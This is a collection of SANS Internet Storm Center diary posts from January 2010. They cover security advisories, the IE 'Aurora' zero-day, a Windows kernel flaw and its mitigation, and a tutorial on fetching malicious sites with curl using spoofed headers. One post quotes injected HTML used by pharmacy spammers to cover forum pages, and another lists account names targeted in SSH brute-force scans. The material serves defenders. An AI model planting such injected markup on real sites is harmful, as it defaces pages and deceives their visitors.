Steven Adair over at ShadowServer has posted a blog entry about the strange going's on with the PushDo botnet. There has been a large rise in the detection of SSL packets hitting a number of domains, www.sans.org included.

If you are the admin of one of these 315 sites and you can grab some of these packets in a pcap and your willing to share, can you upload them via our contact form so that we can compare with what we are seeing.

Have a good weekend.

Steve Hall
ISC Handler of the day

Today VMware has released the following new and updated security advisories:

New - VMSA-2010-0002

This is described as - VMware vCenter update release addresses multiple security issues in Java JRE. The JRE is updated to version 1.5.0_22 and this covers a *lot* of CVE's.

Updated - VMSA-2009-0016.2

The Bank of America web site appears to have been not available for parts of the day  today. No details on what happened have been released as of yet. Their twitter feed indicates they were aware of it and attempting mitigation. If anything does come out I will update this page. If you know anything please let us know!

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

A friend of mine wrote in about a problem he has. He provides support to small businesses, one of which is in the financial industry. The problem is this, they make use of an application, which runs in a client server model. The 'server' shares out a folder for the clients to access, as well as a share on all of the workstations. The software requires that all NTFS and share permissions be set to 'Everyone - full control'. Sounds like a recipe for disaster to my friend, and I concur. This certainly violates the Principle of least privilege (POLP). In this case the client should be advised of the risk, as well as the software vendor. It also makes me wonder what other security best practices and secure programming principles were disregarded by the software vendor, and why they chose to do so? In this case the software is not legacy, it is current and supported by the vendor. The data within the application is considered highly confidential by the company, and the risk to the organization is high should it be lost, modified, or disclosed. If my friend chooses to disregard the vendor recommended configuration the software may not work properly, if at all, and may void vendor support or warranty.

Rob, a fellow ISC handler also points out the following issues he has also come across:

Applications that require users to be in the local admins group on the local workstation.
Applications that require users to have full rights on the app server.
Applications that require full rights in databases.
Applications that log every user into the application, the log them all into the  SQL database using a single account - usually  "sa"  (or equiv on oracle or mysql, but by far most prevalent on sql).

Oddly enough, where i personally see this the most is in financial apps - apps that run payroll, GL, order entry and warehouse management.  Also in support apps for banking clients if you can believe that !

So question #1 is - where have these appdev people been the last 10 years?  Is it just the same appdev people from 10 years ago, who haven't been thinking about security?  Is it new appdev people, who haven't seen security training?  Is it management in the application company who've decided not to develop the app with a secure access model?  Is it all 3?

Question #2 is - why aren't auditors reporting things like this as audit findings?  - I report this stuff, but it's always news to the client, even if they've had someone else auditing them in the past, this stuff never makes the audit.  Is this because there are too many "follow the script" auditors out there, and this just isn't on the script because maybe it's hard to describe?

Once you figure out you have a problem, what option do you have, other than finding a new business system with a better model?  You can't go change permissions on your own, even if it's the right thing to do, because the vendor will throw up their hands on the support side, and blame every problem you call them with on the permissions changes.  You can't change hard-coded db passwords without source code in most cases.

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

The 2nd part of the "Weathering the Storm" blog series is now live [1]. In this series, I am looking at our web logs from isc.sans.org for attacks.

I picked Remote File Inclusion (RFI) attacks because we are getting thousands a day. Just take a quick look at our web honeypot project [2]. Most of the attacks we detect are RFI attacks.

[1] http://blogs.sans.org/appsecstreetfighter/2010/01/29/weathering-the-storm-part-2-a-day-of-weblogs-at-the-internet-storm-center/
[2] http://isc.sans.org/weblogs/

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

If you are running Symantec antivirus, and trying to install Flash, and the Installer is being flagged as a Trojan Horse, now you know why.  Seems there might be a false positive in Symantec's host based detection, flagging the Adobe Flash Installer as a Trojan Horse.

This isn't a big slight, this happens from time to time, with the thousands and thousands of different types of detection that is done with an antivirus tool, it's actually fairly impressive that this type of thing doesn't happen more often.  But it's happened before, and it will happen again.  (Remember the Excel file fiasco that McAfee's AV caused?)

Symantec is encouraging people that are affected to call Symantec support.  I am sure this will be resolved very soon.

Seems that the affected Revision is: 2010-01-27 rev 049.

I'll update this post when it's corrected.

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler

Just wanted to call attention these patches released today: http://www.cisco.com/en/US/products/products_security_advisory09186a0080b1490b.shtml

This affects Cisco Unified MeetingPlace versions 5, 6, and 7.

If you use this software, please start patching.

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler

In the past we have already covered how attackers are using SEO (Search Engine Optimization) poisoning techniques to modify the results obtained from search engines, mainly Google, to point to malicious web sites or accomplish other malicious activities, for example, vishing attacks or IFRAME SEO attacks.

Recently we got details about two active SEO poisoning attacks for two specific hot topics:

•  A new Facebook unnamed app. Sample search term: "facebook unnamed app".
• Today's Apple tablet announcement, called iPad. Sample search term: "apple tablet announcement".

The related search terms for these two hot topics in Google are returning top results pointing to sites that distribute malware.

Apart from the common defense-in-depth practices regarding client and end point protection, one of the best recommendations is to demonstrate this type of attack on your security awareness programs, so that users do not blindly trust any output they get from search engines.

--
Raul Siles (www.raulsiles.com)
Taddong is comming soon...

A while ago I realized we've never mentioned the Command Line Kung Fu blog on the ISC diary. It is authored by a group of good ISC friends and was born on 2009. Definitely, it is a well worth resource to review for ISC readers, specially security and system admins, interested on getting the most out of the command line capabilities of different operating systems, such as Windows (including PowerShell), *nix, and Mac OS X.

--
Raul Siles (www.raulsiles.com)
Taddong is coming soon...

PS: This is specially dedicated to those passionate about how things work, internals, and troubleshooting tasks... such as JSV!

The Campus Party Europe 2010 (http://www.campus-party.eu) will take place on Madrid, April 14-18, 2010, during the Spanish Presidence of the European Union. One of the tracks in the event is the Network Security Area (http://www.campus-party.eu/NetworkSecurity.html), which includes a Security or Hacking Challenge, apart from other security related lectures from renowned speakers. The organizers are selecting two people for each member country of the European Union to participate on this challenge based on their enthusiasm, talent, and technical skills; travel and accommodation are fully covered .

If you are an ISC reader that were born in any EU country and want to participate and represent your country, hurry up, and send your submission! The official deadline is January 31, 2010, although there is a chance it can be slightly extended a few days. It seems the challenge will cover multiple infosec areas, such as reverse engineering, crypto, web-app security, network security, etc.

More information about the official announcement, including where to send your submission, available at http://seclists.org/bugtraq/2009/Dec/257.

Unfortunately, I won't be able to attend as I will be teaching the SANS "Security 542: Web App Penetration Testing and Ethical Hacking" track on Dubai, SANS UAE 2010, April 17-22.

--
Raul Siles (www.raulsiles.com)
Taddong is coming soon...

The website of e107 CMS system was found to be compromised, directing users to malware site but was fixed within a few hours after the news got posted on Bugtraq mailing list. A notice posted on the website after the clean up points to the delay in patching to the latest released e107 software as the problem, as the latest version released few days ago fixed a security vulnerability.

There were also a zip file containing the e107 package that was backdoored. This file was located on the e107.org instead of Sourceforge which is the normal repository for e107. If you are running e107 (version 0.7.17), you might want to download the latest version from Sourceforge and compare source.

Lessons learned, patch quickly, especially if it is software you wrote and/or the public has access to the source code.

VMware announces the first draft of the vSphere Hardening Guide, posted for public comment.  A worthy successor to the current VMware Hardening Guide, it contains over 100 guidelines, split into the following sections:

    * Introduction
    * Virtual Machines
    * Host
    * vNetwork
    * vCenter
    * Console OS (for ESX)

Aside from the versioning difference, this newer version of the guide uses a standardized format, and has severity levels for each security recommendation.  The Hardening Guide can certainly be used as-is for production environments today, but we can expect changes over the next while in response to comments to the posted draft.  While reviewing the draft, you'll see that most guidelines are worded to be "script friendly", which is very nice to see.

The announcement can be found here ==> http://blogs.vmware.com/security/2010/01/announcing-vsphere-40-hardening-guide-public-draft-release.html

The actual hardening guides can be found here ==> http://communities.vmware.com/community/vmtn/general/security?view=documents

Again, each document has a comments form, the authors are actively seeking constructive comments on these documents before going to a final version.

=============== Rob VandenBrink Metafore =================

Do you manage Apache based web server farms with Web Application Firewall (WAF) requirements that revolve primarily around a need for central thresholding/rate limiting features?  Have you found an open source WAF solution that fulfills this need?  Well if you haven't, I take extra special joy in the public sharing of two open projects that I'm involved with, serving the roles of <masculine chest puffing>cheerleader</masculine chest puffing> ;), tester and injecting scope creep whenever possible to solve various forms of abuse. 

Mark Thomas has accomplished some excellent work on a pair of tools consisting of an Apache2 module 'mod_webfw2' and the 'Thrasher' central rate limiting engine.  These tools provide a web application firewall with dynamic rule update features making the "dreaded server farm bounce to enable new or modified rules" a thing of the past.  Mod_webfw2 with Thrasher support also make trivial the task of tracking abusive clients across server farms whether those farms consist of one, several or hundreds of hosts.

The tools suite has been deployed successfully in stomping out automated, distributed attacks on web apps that include (and are not limited to) Account Registration interfaces, Authentication, Webmail, Search engines, Comment/Guestbook/Article abuse, Proxy servers and Web Scraper abuse mitigation.  While I would never be so foolish as to call these tools an HTTP DDoS silver bullet, we have seen the technology-pair successfully deployed as a mitigation against HTTP resource utilization DoS attacks.

Mod_webfw2/Thrasher does not intend to replace or compete with the deep inspection engine available in the open source mod_security, but they operate quite complementary to one another when you have requirements for the advanced features of mod_security along with the need for centralized rate limiting. 

The mod_webfw2 and thrasher project is seeking project testers and contributors.
 

William Salusky - Handler on Duty ;)

The Aurora target attack made me think about the client applications again.

This and when I saw Mikko Hypponen's twitter message on the saveie6.com website (that was actually quite funny).
For some time the weakest link on computer security has been the outdated applications/OS.
At first, the OS (in this case I am specific about MS Windows) was the main target and Microsoft decided to include
the option to install updates automatically.

This definitely helped a lot the regular user. But what about the third party applications, such as another browser (Firefox, Chrome, Safari),
media player ( realplayer, quicktime...), doc reader,etc...?
For some years, the exploit kits such as MPack are quite smart on keep large databases of exploit for several different client applications.
Sometime ago I found an application that would keep track of all installed applications and check for the most recent versions and pop up
when it was available.
My main concern in this case was privacy.

How do you handle/manage client application upgrade? In your home or company?
Send me your ideas and I will post a consolidated list of suggestions.

__________________________________

Pedro Bueno (pbueno /%%/ isc. sans. org)

Twitter: http://twitter.com/besecure

This isn't a glamorous topic and quite frankly it's not my favorite one to talk about or to work on.  I'd much rather be off in a corner looking at malware or analyzing some packets.  However, it is one that I respect and understand the importance of it.  It is one that you can't afford to overlook.  I have found time and time again that having good policies, processes and procedures keep you out of trouble.  Before we start, let's make sure that everyone understands the difference.  I have seen time and time again where the three get mixed up and procedures end up in the policy etc.  They each serve different purposes.   A policy is high level and lays out short and concise what is expected.  It doesn't tell you how to do it.  The processes lay out the flow of information that it will take to enforce the policy.  The procedures are what lays out the exact "how" you are going to do something.  For example, the policy states that you will have an incident handling team.  The process lays out the different areas, people involved and the flows of information that have to be considered in order to have a good structure to support an incident handling team.  A procedure then takes specific areas of the process and defines the exact "how" to do it.

How can this keep you out of trouble you might ask?   Well, let's say someone didn't like the fact they got caught surfing porn at work.  In fact, they were so upset that they filed an HR complaint and said that you were targeting them because you didn't like them.  If things were done right, you took your company's Internet usage policy which states the acceptable behavior of the employees.  (Surfing porn while at work was forbidden in the policy.)  That Internet usage policy was broken down into a process(s) for how to enforce the policy.  Some of the policy would be enforced on the firewalls and some on the web proxy.  The IDS had rules created that audited the policy and looked for traffic containing porn.  Each of these three areas were further broken down into procedures for how the devices would be configured, how notification would occur and who to report things to etc.  All of the processes and procedures were sent to management for review, which they approved.  The disgruntled employee does not have a leg to stand.  You can show you were following the approved processes and procedures that applies to looking at all network traffic and shows it does not target a specific individual.  Otherwise, you have to prove that you were not targeting them and won't have the benefit of showing you were following approved processes and procedures.

Another thing, whether you are on the incident handling team, a security analyst in the SOC or a user on the floor, having processes and procedures is critical to protecting your organization's information.  You can't afford to have a major event and realize you don't know what to do.  When your network is under a heavy DoS attack is not the time to find out that your procedures didn't get updated for the new equipment that you now have in your infrastructure.  If you're handling an incident and management is going crazy and yelling at everyone, that is not the time to find out you don't have a procedure written to do a dd of the hard drive.  Everyone just always knew how to do it and now you have the newbie with you who doesn't know how to do it.  It may not even be that they are not written.  Stress can make you forget things.  Mistakes are less likely to be made if you follow a laid out process and procedure when things get hectic and people are screaming.

What ever the case, having good policies, processes and procedures will only make you and your organization better.  So, since its the beginning of a new year, take some time and update your policies and look at your processes and procedures.  Have they changed?  Do they need updating?  Are they even helpful?  Writing something for the sake of saying you have it is a waste of time.  Run some crew drills, do a dry run, what ever it takes, it pays up front to make sure you're are covered!

A mandatory management tool for incident response is called the "pass down".  It is the accurate and systematic passing along of detailed information from the current case handler to the next shift of incident handlers.  As a newbie to security in 1998, I was working as a contractor attached to the Navy and Marine Corp Incident Response Team (NAVCIRT).  This was my first introduction to the methodology of pass down in practice.  The results of this mandatory information review and collaboration between shifts and managers is a successful tool, properly utilized to achieve legally obtained and verifiable evidence for use in court.

Documenting what you accomplished during your shift in the case development is crucial. Write it down, all of it, hunches, wild guesses, everything.  This creative flow of thought should assist in case development.  This process flows so efficiently, and the successful interaction of the Incident Response Team will amaze you.  Ultimately leading to a more effective, cohesive and educated team.  Responding to an incident as quickly as possible, remediating  the vulnerability and getting back to other handler duties.

Let's say you have a new handler come on board.  How would you advise this person?  Really stop and think for a moment.  Besides our site (of course :-), isc.sans.org) where would you recommend a newbie go to get the types of information you use daily to analyze your cases. 

Send us a couple of your tips.  Let's work together to get us all up-to-date on where the latest and greatest minds are gathering good data. Where do you go to get a memory upload of current Internet activity, secrets, or help for any parameters?   Send them to us here and we'll post some of the best hints posted here!.

Mari Nichols,

Handler on Duty

UPDATE:  Thanks to Stephan, Clara, Steve and Bill for submitting their favorite links.  If you have anymore to add, please let us know!

http://www.symantec.com/business/security_response/index.jsp
https://www.cert-bund.de/overview/AdvisoryShort (Sometimes i'm too lazy for translating - use SOME Cert's of your choice)
http://www.securityfocus.com/
http://www.malwareurl.com/index.php
https://zeustracker.abuse.ch/
http://dnsbl.abuse.ch/
http://dnsbl.abuse.ch/links.php
http://packetstormsecurity.org/
http://seclists.org/bugtraq/
http://www.owasp.org/index.php/ASVS
http://www.honeynet.org
http://secviz.org/
http://windowsir.blogspot.com/
http://securosis.com/
http://www.vupen.com
http://www.secunia.com
http://seclists.org

Firefox released 3.6 today with a few notable improvements.

• Changes were made that prevent other programs from adding their own toolbar to Firefox without your permission.
• Firefox 3.6 will alert you about out of date and insecure plugins.
• Private browsing also removes TEMP files

The full details can be found at http://support.mozilla.com/en-US/kb/Upgrading+to+Firefox+3.6 and the upgrade can be downloaded from http://www.mozilla.com/en-US/firefox/upgrade.html

Thanks to Jason and Gilbert for letting us know.

Christopher Carboni - Handler On Duty

 Overview of the Out of band January 2010 Microsoft patch and status.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Microsoft released the out of band security bulletin and patch it announced yesterday. MS10-002 is a cumulative patch for Internet Explorer. It fixes a total of 8 vulnerabilities. The "famous" vulnerability that triggered the release, CVE-2010-0249, is currently being exploited. According to the bulletin, none of the other vulnerabilities are currently being exploited and all had been disclosed to Microsoft directly without any prior public disclosure.

Given the number of ever improving exploits against CVE-2010-0249, and the publicly known use of these exploits, we recommend that you patch as soon as possible.

Rex and Chris (thank guys!) wrote in to tell us that Adobe has released a security update for Shockwave Player for 11.5.2.602 and earlier versions for Windows and Macintosh

Full details are available on the Adobe support site at www.adobe.com/support/security/bulletins/apsb10-03.html

Christopher Carboni - Handler On Duty

Yesterday, we reported about a new Windows Kernel vulnerability [1] . The vulnerability affects all versions of Windows (NT 3.51 up to Windows 7) unless 16-bit application support is disabled. If exploited, the vulnerability will lead to privilege escalation.

Today, Microsoft released an official response in the form of a Security Advisory [2]. The advisory (KB Article 979682) states that Microsoft is investigating the report, and is not aware of any use of the vulnerability in current exploits.

According to Microsoft's list of vulnerable and non-vulnerable systems, 64 bit version of the Windows OS are not vulnerable, but 32 bit versions are. In part this is due to the fact that 64 bit versions of Windows do not include the vulnerable feature (16 bit compatibility).

The workaround outlined by Microsoft matches the workaround proposed in the advisory: Disable access to 16 bit applications. This should work well for the vast majority of systems. But be aware that there is a reason for this feature: Some old (very old) applications do require 16 bit support. This may in particular affect old custom software and support for odd hardware configurations. A standard office desktop should not require any 16 bit applications. As always: Test first.

The CVE number CVE-2010-0232 has been assigned to this issue [3].

[1] http://isc.sans.org/diary.html?storyid=8023
[2] http://www.microsoft.com/technet/security/advisory/979682.mspx
[3] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0232 (not live yet as of this writing)

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Microsoft posted "an advance notification of one out-of-band security bulletin that Microsoft is intending to release on January 21, 2010. The bulletin will be for Internet Explorer to address limited attacks against customers of Internet Explorer 6, as well as fixes for vulnerabilities rated Critical that are not currently under active attack."

For details, see:

http://www.microsoft.com/technet/security/bulletin/ms10-jan.mspx

Update:

Microsoft also posted a comprehensive overview of the exploits that target this vulnerability. See:

http://blogs.technet.com/srd/archive/2010/01/20/reports-of-dep-being-bypassed.aspx

 -- Lenny

Lenny Zeltser - Security Consulting
Lenny teaches malware analysis at SANS Institute. You can find him on Twitter.

Here's how to use Curl to download potentially-malicious websites, and why you may want to use this tool instead of the more-common Wget.

Curl and Wget are excellent command-line tools for Windows and Unix. They can download remote files and save them locally without attempting to display or render them. As the result, these tools are handy for retrieving files from potentially malicious website for local analysis--the small feature-set of these utilities, compared to traditional Web browsers, minimizes the vulnerability surface.

Both Curl and Wget support HTTP, HTTPS and FTP protocols, and allow the user to define custom HTTP headers that malicious websites may examine before attempting to attack the visitor (more on that below). Curl also supports other protocols you might find useful, such as LDAP and SFTP; however, these protocols are rarely used by analysts when examining content and code of malicious websites.

Overall, the two tools are similar when it comes to retrieving remote website files. However, the one limitation of Wget that is relevant for analyzing malicious websites it its inability to display contents of remote error pages. These error pages might be fake and contain attack code. Curl will retrieve their full contents for your review; Wget will simply display the HTTP error code.

Consider this example that uses Wget:

$ wget http://www.example.com/page

Resolving www.example.com...
Connecting to www.example.com:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2010-01-19 05:37:11 ERROR 404: Not Found. 

Many analysts assume that the malicious web page is gone when they see this. However, consider the same connection made with Curl:

$ curl http://www.example.com/page

<HTML>
<HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY>
<H2>404 Not Found</H2>
<SCRIPT>
document.write("Hi there, bear!");
</SCRIPT>
<P>The requested URL was not found on this server.</P>
</BODY>
</HTML>


Now you can see that the error page is an HTML document that has JavaScript embedded in it. In this example, the script simply prints a friendly greeting; however, it could have been malicious. The victim's browser would render the page and execute the script that could implement an attack.

Another useful feature of Curl is its ability to save headers that the remote web server supplied when responding to the HTTP request. This is useful because JavaScript obfuscation techniques make use of information about the page and its context, such as its last-modified time. Saving the headers allows the analyst to use this information when/if it becomes necessary. Use the "-D" parameter to specify the filename where the headers should be saved:

$ curl http://www.example.com/page -D headers.txt


<HTML>
<HEAD><TITLE>404 Not Found</TITLE></HEAD>
...


$ cat headers.txt

HTTP/1.1 404 Not Found
Server: Apache/2.0.55
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 19 Jan 2010 05:51:44 GMT
Last-Modified: Wed, 19 Jan 2010 03:51:44 GMT
Accept-Ranges: bytes
Connection: close
Cache-Control: no-cache,no-store


If you wish Curl to also save the retrieved page to a file, instead of sending it to STDOUT, use the "-o" parameter, or simply redirect STDOUT to a file using ">". This is particularly useful when retrieving binary files, or when the web server responds with an ASCII file that it automatically compressed. If you're not sure about the type of the file you obtained, check it using the Unix "file" command or the TrID utility (available for Windows and Unix).

Whether using Curl or Wget to retrieve files from potentially-malicious websites, consider what headers you are supplying to the remote site as part of your HTTP request. Many malicious sites look at the headers to determine how or whether to attack the victim, so if they notice Curl's or Wget's identifier in the User-Agent header, you won't get far. Malicious sites also frequently examine the Referer header to target users that came from specific sites, such as Google. Even if you define these headers, the lack of other less-important headers typically set by traditional Web browsers could give you away as an analyst.

I recommend creating a .curlrc or a .wgetrc file that defines the headers you wish these tools to supply. You can define these options on the command-line when calling Curl and Wget, but I find it more convenient to use the configuration files. Consider using your own web server, "nc -l -p 80", and/or a network sniffer to observe what headers a typical browser such as Internet Explorer sends, and define them in your .curlrc or .wgetrc file. Here's one example of a .curlrc file:

header = "Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*"
header = "Accept-Language: en-us"
header = "Accept-Encoding: gzip, deflate"
header = "Connection: Keep-Alive"

user-agent = "Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 3.0.04506.30)"
referer = "http://www.google.com/search?hl=en&q=web&aq=f&oq=&aqi=g1"

The syntax for .wgetrc is very similar, except you should not use quotation marks when defining each field. (Here is another example specific to .wgetrc.)

You may need to tweak "user-agent" and "referer" fields for a specific situation. For more examples of User-Agent strings, see UserAgentString.com.

The "Accept-Encoding" specifies that your browser is willing to accept compressed files from the web server. This will slow you down a bit, because you'll need to decompress the responses (e.g., "gunzip"); however, it will make your request seem more legitimate to the malicious website.

There you have it--a few tips for using Curl (and Wget) for retrieving files from potentially malicious websites. What do you think?

 -- Lenny

Lenny Zeltser - Security Consulting
Lenny teaches malware analysis at SANS Institute. You can find him on Twitter.

Rogue on-line pharmacy sites, claiming to sell legitimate medicine to naive shoppers, continue to be a problem. This quick note is about one approach used to insert advertisements into forum discussions that completely cover up the legitimate discussion page.

My first look at this approach began with an ISC reader J. notifying us of an apparent defacement of a particular discussion thread on social.technet.microsoft.com:

The advertisement is for medical.deal-info.info (please don't go there).

The offending HTML code seems to have been added to the discussion thread as a forum posting. Here's the relevant HTML source code excerpt that sets the stage for the advertisement:

<div class="container"><div class="body"><div style="border:medium none;background:white none repeat scroll 0% 50%;position:fixed;left:0pt;top:0pt;text-decoration:none;width:1700px;height:7600px;z-index:2147483647">

The <div class="body"> tag part of the original website's code and is supposed to be followed by the user's forum posting, such as "I have a question about CAS servers..." Instead, we see HTML code creating a white DIV region that is at the top left corner of the browser's window and is 1700x7600 pixels in size to cover the forum's legitimate content. The "z-index" parameter is set to 2147483647, which is the largest possible value for many browsers; this is to make sure that the offending region is on top of any other elements on the page.

As the result, the whole website looks defaced. In reality, the discussion's page content is still in place--it was just covered up by the advertisement.

I'm unclear why the forum software did not filter out the HTML tags when they were submitted for posting; this may be attributed to an input-scrubbing bug.

I came across several other pharma-advertising websites that employed a similar discussion-covering technique:

This advertisement is for canadian-drugshop.com and supercapsulesrx.com (please don't go there).

Here's relevant HTML source code excerpt:

div style="border: medium none ; background: white none repeat scroll 0% 0%; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous; position: fixed; left: 0pt; top: 0pt; text-decoration: none; width: 1700px; height: 7600px; z-index: 2147483647

And another example using similar code:

This advertisement is for top.pharma-search.biz and purchase.dnsdojo.com (please don't go there).

Have you analyzed such incidents? Have insights to offer? Please let us know.

 -- Lenny

Lenny Zeltser - Security Consulting
Lenny teaches malware analysis at SANS Institute. You can find him on Twitter.

Internet Systems Consortium (ISC) announced the release of the BIND 9.6.1-P3 security patch to address two cache poisoning vulnerabilities, "both of which could allow a validating recursive nameserver to cache data which had not been authenticated or was invalid."

CVE-2010-0097: Low severity
CVE-2009-4022: Medium severity

You can download BIND 9.6.1-P3 from:

ftp://ftp.isc.org/isc/bind9/9.6.1-P3/bind-9.6.1-P3.tar.gz
ftp://ftp.isc.org/isc/bind9/9.6.1-P3/BIND9.6.1-P3.zip (binary kit for Windows XP/2003/2008)

 -- Lenny

Lenny Zeltser - Security Consulting
Lenny teaches malware analysis at SANS Institute. You can find him on Twitter.

In an effort not to be left out, Apple has released Security Update 2010-001 which patches a dozen vulnerabilities in CoreAudio (code execution via crafted MP4), CUPS (remote DoS), Flash Player Plug-in (multiple including arbitrary code execution), ImageIO (code execution via crafted TIFF file), Image Raw (code execution via crafted DNG image), and OpenSSL (the renegotiation exploit).  Details can be found here: http://support.apple.com/kb/HT4004

---------------
Jim Clausing, jclausing --at-- isc [dot] sans (dot) org

In a posting to a public mailing list, Tavis Ormandy disclosed a zero day privilege escalation vulnerability in the Windows kernel. All versions of Windows, starting with Windows NT 3.1 up to including Windows 7, are affected.

The vulnerability affects support for 16 bit applications. In most cases, it is safe to turn off support for 16 bit applications.

Here are the mitigation instructions (copied from the advisory):

Temporarily disabling the MSDOS and WOWEXEC subsystems will prevent the attack  from functioning, as without a process with VdmAllowed, it is not possible to access NtVdmControl() (without SeTcbPrivilege, of course).

The policy template "Windows ComponentsApplication CompatibilityPrevent access to 16-bit applications" may be used within the group policy editor to prevent unprivileged users from executing 16-bit applications. I'm informed this is an officially supported machine configuration.

Administrators unfamiliar with group policy may find the videos below instructive. Further information is available from the Windows Server Group Policy Home

http://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx.

To watch a demonstration of this policy being applied to a Windows Server 2003 domain controller, see the link below.

http://www.youtube.com/watch?v=XRVI4iQ2Nug

To watch a demonstration of this policy being applied to a Windows Server 2008 domain controller, see the link below.

http://www.youtube.com/watch?v=u8pfXW7crEQ

To watch a demonstration of this policy being applied to a shared but unjoined Windows XP Professional machine, see the link below.

http://www.youtube.com/watch?v=u7Y6d-BVwxk

On Windows NT4, the following knowledgebase article explains how to disable the NTVDM and WOWEXEC subsystems.

http://support.microsoft.com/kb/220159

Applying these configuration changes will temporarily prevent users from accessing legacy 16-bit MS-DOS and Windows 3.1 applications, however, few users
require this functionality.

If you do not require this feature and depend on NT security, consider permanently disabling it in order to reduce kernel attack surface.

This is not a good month for Microsoft. Tavis disclosed the vulnerability to Microsoft about 6 months ago. Microsoft's monthly bulletin's credited Tavis numerous times in the past for disclosing vulnerabilities.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Arbor has released their 2009 Worldwide Infrastructure Security Report and it is an interesting read.  The largest DDoS increased nearly 5-fold from 2004 to 2008 (and doubled from 2006 to 2008) to 49Gbps.  At that size, you definitely need the assistance of your upstream service provider to mitigate.  The report also shows the continuing trend of not reporting/referring attacks to law enforcement.

The report can be found at http://staging.arbornetworks.com/dmdocuments/ISR2009_EN.pdf

---------------
Jim Clausing, jclausing --at-- isc [dot] sans (dot) org

 No, there still isn't a patch, but there will be one before the regular Microsoft patch day in February.  The MSRC has posted a note on their blog saying the timing will be announced tomorrow.  In the meantime, we are hearing that the folks at VUPEN have found a way to bypass DEP as long as javascript is enabled (no, this doesn't appear to be the .NET ones from last year) which would make even IE8 vulnerable, we don't have the details at present, but if true this is a major development.  This is a concern since Microsoft's advice is for those using IE6 and IE7 to move to IE8 where DEP is on by default.  In any event, we continue to monitor the situation.

---------------
Jim Clausing, jclausing --at-- isc [dot] sans (dot) org

Even when I am doing some of it as part of my day job, I still enjoy participating in, and seeing the results of, the forensic/packet contests/challenges that can be found periodically being run by folks I respect.  Currently there are at least 2 challenges that look interesting.  The first is put together by the authors of the SANS 558 - Network Forensics course.  Info on that one can be found at http://forensicscontest.com/2009/12/28/anns-appletv.  Their first two contests have been kind of fun, (in the interest of full disclosure, I'll be posting my solution to #2 on my handlers page over the weekend (talking to Jonathon and Sherry last week at SANS Security East, I decided I want to make one more minor addition to my scripts)).  The other is from the Honeynet Project and can be found at https://honeynet.org/node/504.  Both run until 1 Feb, so if you've got some time, give them a look.

---------------
Jim Clausing, jclausing --at-- isc [dot] sans (dot) org

A number of our readers have submitted that they have both experienced, or noticed the uplift in source IP's scanning for SSHD daemons.

You can see the uplift in the snapshot taken from our DShield database.

In addition to this, our reader Andrew also submitted some analysis of the hit count of some common account names:

 1209 root
  120 postgres
  114 test
  100 oracle
   88 nagios
   88 student
   83 tomcat
   77 ts
   76 user
   72 svnuser
   72 ts2
   71 demo
   67 psybnc
   66 admin
   64 backup

And this brings about an opportunity to remind our readers that they can submit their firewall logs to us to allow this ISC Handler, DShield and reader cooperation to expand. For details on how this is achieved please see our submission page.

Steve Hall
ISC Handler

A Dutch reader, G. Smit, gave us a heads up about a remotely exploitable vulnerability in Quicktime which can be exploited by malformed .mov files.

There is some information available at Offensive-security blog, in Dutch  at security.nl, Fortiguard also shows the vulnerability.  Securityfocus has also updated Bugtraq 32540.

 The guidance seems to be to update to the latest version of Quicktime, 7.6.5.  Unfortunately, there does not appear to be an updated Mac version yet.

-- Rick Wanner - rwanner at isc dot sans dot org

 A few people have written in to ask us why we have not gone to Infocon Yellow regarding the IE 0 day.  

Changing the Infocon is a decision not taken lightly as we do know that people look at ISC and based on the infocon, react.  Our definitions of when to change are also different to many other organisations and this causes some confusion in some readers.  For example McAfee at the moment is at Critical, Symantec and Trend Micro are at Elevated, we are at Green for business as usual.

A number of reasons went into the decision not to raise the Infocon level.  Currently there is no real evidence that "aurora" is wide spread, we have certainly not been inundated with reports.  An exploit is available in Metasploit, but as far as we are aware at this moment there are no automated tools taking advantage of the exploit and widely attacking the internet.   The exploit currently affects a version of the product that is two major revisions behind the current release, and should really not be widely used anymore.  Easy work arounds are available by utilising other browsers or products, signatures are available from the AV vendors and the patch should be available in the next 3-4 weeks.  From an Internet perspective the issue is currently very very low impact.  

That said there are a number of things that have happened that we should all be aware of.  The Google hack, malicious PDF files, there is an increase in FakeAV, and there will be scams relating to Haiti.  Likewise there is a big chance that the "aurora" module will make an appearance in the various attack packs.  

For now we will be monitoring the situations and keep you posted as usual. 

Mark H 

The details for CVE-2010-0249 aka Microsoft Security Advisory 979352 (http://www.microsoft.com/technet/security/advisory/979352.mspx) aka the Aurora exploit has been made public.  It is a vulnerability in mshtml.dll that works as advertised on IE6 but if DEP is enabled on IE7 or IE8 the exploit does not execute code.

I expect Microsoft will have a patch available for the standard February patch day.  There will not likely be an out-of-band patch for this unless a 3rd party makes their own available.
 

The word “Adobe” conjures up a number of meanings here.  When we get an email that mentions just “Adobe,” we fill in the blank with one of the following:

• Adobe the Company
• Adobe Acrobat
• Adobe Acrobat Reader
• Etc.

This invariably leads to confusion.

A similar confusion exists surrounding the recently reported Google incident (http://isc.sans.org/diary.html?storyid=7969) especially when Adobe released a similarly worded announcement: http://blogs.adobe.com/conversations/2010/01/adobe_investigates_corporate_n.html
